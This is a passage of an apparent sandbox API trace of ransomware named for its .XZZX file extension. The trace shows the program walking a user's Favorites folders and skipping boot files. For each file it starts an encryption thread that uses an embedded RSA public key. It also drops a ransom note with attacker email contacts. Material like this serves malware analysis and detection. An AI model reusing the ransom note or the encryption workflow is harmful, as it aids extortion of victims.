KEY-----" [0180.966] lstrcpyW (in: lpString1=0x17be7c, lpString2="30FEF3B4011ABE0E503ED66C0532A256.XZZX" | out: lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned="30FEF3B4011ABE0E503ED66C0532A256.XZZX" [0180.966] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0180.966] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb5c [0180.967] Sleep (dwMilliseconds=0x96) [0181.121] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.121] lstrcmpW (lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpString2="..") returned 1 [0181.121] lstrcmpW (lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpString2=".") returned 1 [0181.121] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0181.121] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="ntldr") returned 0x0 [0181.121] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="NTLDR") returned 0x0 [0181.122] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0181.122] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0181.122] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0181.122] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") [0181.122] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.122] lstrcpyW (in: lpString1=0x17be7c, lpString2="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" | out: lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" [0181.122] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0181.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb60 [0181.122] Sleep (dwMilliseconds=0x96) [0181.277] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.277] lstrcmpW (lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpString2="..") returned 1 [0181.278] lstrcmpW (lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpString2=".") returned 1 [0181.278] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0181.278] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="ntldr") returned 0x0 [0181.278] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="NTLDR") returned 0x0 [0181.278] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0181.278] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0181.278] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0181.278] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") [0181.278] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.278] lstrcpyW (in: lpString1=0x17be7c, lpString2="FD9030E848C62D90344A51E94CDE11D8.XZZX" | out: lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX") returned="FD9030E848C62D90344A51E94CDE11D8.XZZX" [0181.278] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0181.278] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb64 [0181.279] Sleep (dwMilliseconds=0x96) [0181.433] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.433] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0181.433] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0181.433] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0181.433] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0181.433] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0181.434] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0181.434] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0181.434] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0181.434] SetErrorMode (uMode=0x1) returned 0x1 [0181.434] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT") returned 80 [0181.434] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0181.435] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0181.435] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xb68) returned 0x0 [0181.435] RegQueryValueExW (in: hKey=0xb68, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437d788, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x437d788*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0181.435] RegCloseKey (hKey=0xb68) returned 0x0 [0181.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0181.435] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0181.435] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb68 [0181.436] CloseHandle (hObject=0xb68) returned 1 [0181.436] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0181.436] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0181.436] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0181.436] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0181.436] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0181.436] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.436] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0181.436] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.436] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.436] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.436] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.436] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.437] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.437] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0181.437] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0181.437] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0181.437] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0181.437] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0181.437] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0181.437] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0181.437] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0181.437] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0181.437] SetErrorMode (uMode=0x1) returned 0x1 [0181.437] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0181.437] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.437] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.437] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0181.437] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0181.438] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="MSN Websites" [0181.438] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0181.438] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.438] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.438] lstrcmpW (lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX", lpString2="..") returned 1 [0181.438] lstrcmpW (lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX", lpString2=".") returned 1 [0181.438] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0181.438] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="ntldr") returned 0x0 [0181.438] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="NTLDR") returned 0x0 [0181.438] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0181.439] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="ntdetect.com") returned 0x0 [0181.439] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0181.439] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") [0181.439] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.439] lstrcpyW (in: lpString1=0x17be7c, lpString2="13771DB6235C0ADD78BD03922773EF25.XZZX" | out: lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX") returned="13771DB6235C0ADD78BD03922773EF25.XZZX" [0181.439] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.439] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb70 [0181.439] Sleep (dwMilliseconds=0x96) [0181.589] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.589] lstrcmpW (lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX", lpString2="..") returned 1 [0181.589] lstrcmpW (lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX", lpString2=".") returned 1 [0181.589] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0181.589] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="ntldr") returned 0x0 [0181.589] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="NTLDR") returned 0x0 [0181.589] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0181.589] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0181.589] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0181.589] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") [0181.590] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.590] lstrcpyW (in: lpString1=0x17be7c, lpString2="583CA788134302604AF8FA2E175AE6A8.XZZX" | out: lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX") returned="583CA788134302604AF8FA2E175AE6A8.XZZX" [0181.590] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.590] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb74 [0181.590] WaitForSingleObject (hHandle=0xb74, dwMilliseconds=0xffffffff) returned 0x0 [0181.591] Sleep (dwMilliseconds=0x96) [0181.745] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.745] lstrcmpW (lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpString2="..") returned 1 [0181.745] lstrcmpW (lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpString2=".") returned 1 [0181.745] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0181.745] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="ntldr") returned 0x0 [0181.745] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="NTLDR") returned 0x0 [0181.745] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0181.745] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="ntdetect.com") returned 0x0 [0181.745] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0181.745] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") [0181.746] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.746] lstrcpyW (in: lpString1=0x17be7c, lpString2="833DF956476C97EAEAF8AD0B4B847C32.XZZX" | out: lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned="833DF956476C97EAEAF8AD0B4B847C32.XZZX" [0181.746] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.746] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb78 [0181.746] Sleep 